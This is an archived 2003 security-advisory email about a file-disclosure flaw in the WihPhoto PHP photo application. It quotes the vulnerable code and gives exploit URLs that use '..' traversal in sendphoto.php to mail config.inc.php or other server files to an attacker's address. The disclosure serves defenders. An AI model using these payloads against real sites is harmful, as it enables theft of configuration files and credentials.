[VulnWatch] WihPhoto (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/23/03

  • Next message: H D Moore: "[VulnWatch] Terminal Emulator Security Issues"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sun, 23 Feb 2003 18:44:58 +0100
    
    

    Informations :
    같같같같같같같
    Version : 0.86-dev
    Website : http://www.wihsy.com
    problem : All files from the hard disk can be send by mail

    PHP Code/Location :
    같같같같같같같같같
    util/email.php :

    ------------------------------------------------------------------------
    <?
    class CMailFile {
            var $subject;
            var $addr_to;
            var $text_body;
            var $text_encoded;
            var $mime_headers;
            var $mime_boundary = "--==================_846811060==_";
            var $smtp_headers;

            function CMailFile($subject,$to,$from,$msg,$filename,$mimetype =
    "application/octet-stream", $mime_filename = false) {
                    $this->subject = $subject;
                    $this->addr_to = $to;
                    $this->smtp_headers = $this->write_smtpheaders($from);
                    $this->text_body = $this->write_body($msg);
                    $this->text_encoded =
    $this->attach_file($filename,$mimetype,$mime_filename);
                    $this->mime_headers = $this->write_mimeheaders($filename, $mime_filename);
            }

            function attach_file($filename,$mimetype,$mime_filename) {
                    $encoded = $this->encode_file($filename);
                    if ($mime_filename) $filename = $mime_filename;
                    $out = "--" . $this->mime_boundary . "\n";
                    $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n";
                    $out = $out . "Content-Transfer-Encoding: base64\n";
                    $out = $out . "Content-disposition: attachment;
    filename=\"$filename\"\n\n";
                    $out = $out . $encoded . "\n";
                    $out = $out . "--" . $this->mime_boundary . "--" . "\n";
                    return $out;
    // added -- to notify email client attachment is done
            }

            function encode_file($sourcefile) {
                    if (is_readable($sourcefile)) {
                            $fd = fopen($sourcefile, "r");
                            $contents = fread($fd, filesize($sourcefile));
                            $encoded = my_chunk_split(base64_encode($contents));
                            fclose($fd);
                    }
                    return $encoded;
            }

            function sendfile() {
                    $headers = $this->smtp_headers . $this->mime_headers;
                    $message = $this->text_body . $this->text_encoded;
                    mail($this->addr_to,$this->subject,$message,$headers);
            }

    [...]

            function write_mimeheaders($filename, $mime_filename) {
                    if ($mime_filename) $filename = $mime_filename;
                    $out = "MIME-version: 1.0\n";
                    $out = $out . "Content-type: multipart/mixed; ";
                    $out = $out . "boundary=\"$this->mime_boundary\"\n";
                    $out = $out . "Content-transfer-encoding: 7BIT\n";
                    $out = $out . "X-attachments: $filename;\n\n";
                    return $out;
            }
    [...]
    }
    [...]
    ------------------------------------------------------------------------

    sendphoto.php :

    ------------------------------------------------------------------------
    include("util/email.php");

    include("config.inc.php");

    [...]
    if (!$filled) {

    print "<FORM METHOD=POST ACTION=sendphoto.php>\n";
    print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n";
    print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n";
    print "<INPUT TYPE=hidden NAME=album VALUE=";
    print rawurlencode($album);
    print ">\n";
    print "<center><p>$sendphoto_send_photo_to<br>";
    print "<INPUT NAME=sendto></input></center>\n";
    print "<p>\n";
    print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n";
    print "</form>\n";
    print "</body></html>\n";

    }
    else
    {

    $message = "$sendphoto_message";
    $album1 = rawurldecode($album);
    $filetoattach = "./$pix_base/$album1/$pic";
    $mimetype = "image/jpeg";

    $newmail = new
    CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype);
    $newmail->sendfile();

    print "$sendphoto_successful";

    print "</body></html>\n";
    }

    ?>
    ------------------------------------------------------------------------

    Exploits :
    같같같같같
    http://[target]/sendphoto.php?album=..&pic=config.inc.php
    or
    http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1

    where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be
    sent.

    Patch :
    같같같
    A patch can be found on http://www.phpsecure.info .

    More Details :
    같같같같같같같
    In French :
    http://www.frog-man.org/tutos/WihPhoto.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools:11:11 +0100 (CET)

    frog-m@n

    _________________________________________________________________
    MSN Messenger : discutez en direct avec vos amis !
    http://messenger.fr.msn.be



    Relevant Pages

    • WihPhoto (PHP)
      ... Website: http://www.wihsy.com ... All files from the hard disk can be send by mail ... class CMailFile { ... In French: ...
      (Bugtraq)
    • Re: Stop Word from changing relative links to absolute ones
      ... I made a small addition to a page of links on our website. ... functioned normally when accessed from my hard disk. ... links with absolute ones pointing to a folder on my hard disk! ... thing as replace relative links with absolute ones? ...
      (microsoft.public.word.docmanagement)
    • Stop Word from changing relative links to absolute ones
      ... I made a small addition to a page of links on our website. ... functioned normally when accessed from my hard disk. ... links with absolute ones pointing to a folder on my hard disk! ... thing as replace relative links with absolute ones? ...
      (microsoft.public.word.docmanagement)
    • Re: Trouble with Maxtor hard drives: clunking!
      ... > I have THREE Maxtor hard drives. ... > I've read in a few user reviews about a 'clunking' problem. ... > problem is with the hard disk. ... then go to maxtor's website and follow the instructions for warranty! ...
      (microsoft.public.windowsxp.hardware)